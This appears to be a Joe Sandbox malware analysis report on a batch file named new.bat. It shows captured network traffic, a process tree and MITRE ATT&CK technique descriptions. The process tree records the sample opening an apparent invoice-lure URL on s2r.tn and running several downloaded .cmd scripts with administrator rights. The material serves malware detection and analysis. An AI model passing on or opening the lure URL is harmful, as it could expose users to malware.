2024-05-23 16:32:40 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: e1bc6824-8b8b-4767-ac38-470b8c677ef4 MS-RequestId: 6669090a-6fa9-4862-829e-568eb9e990e6 MS-CV: PYim2D4EB0muF5bT.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:32:40 GMT Connection: close Content-Length: 24490
2024-05-23 16:32:40 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-23 16:32:40 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	64821	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:41 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 16:32:42 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440" MS-CorrelationId: fd441cd7-1e9b-4ed4-bfac-a4f516082a78 MS-RequestId: 2db58f1c-f653-4497-870d-29bdf80ef5d5 MS-CV: 1aZFPhovkEyTTX/l.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:32:41 GMT Connection: close Content-Length: 25457
2024-05-23 16:32:42 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-23 16:32:42 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exePID: 6472, Parent PID: 2580

General

Target ID:	0
Start time:	12:31:57
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Imagebase:	0x7ff6d1f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5756, Parent PID: 6472

General

Target ID:	1
Start time:	12:31:57
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7224, Parent PID: 6472

General

Target ID:	2
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7240, Parent PID: 6472

General

Target ID:	3
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Downloads\kam.cmd""
Imagebase:	0x7ff6d1f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7260, Parent PID: 7240

General

Target ID:	4
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7272, Parent PID: 6472

General

Target ID:	5
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Downloads\las.cmd""
Imagebase:	0x7ff6d1f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7304, Parent PID: 7272

General

Target ID:	6
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7316, Parent PID: 6472

General

Target ID:	7
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Downloads\zap.cmd""
Imagebase:	0x7ff6d1f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7332, Parent PID: 7316

General

Target ID:	8
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7364, Parent PID: 6472

General

Target ID:	9
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ""C:\Users\user\Downloads\xff.cmd""
Imagebase:	0x7ff6d1f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7392, Parent PID: 7364

General

Target ID:	10
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7648, Parent PID: 7224

General

Target ID:	12
Start time:	12:31:58
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report new.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: cmd.exePID: 6472, Parent PID: 2580

General

Chronological Activities

Analysis Process: conhost.exePID: 5756, Parent PID: 6472

General

Chronological Activities

Analysis Process: chrome.exePID: 7224, Parent PID: 6472

Windows Analysis Report
new.bat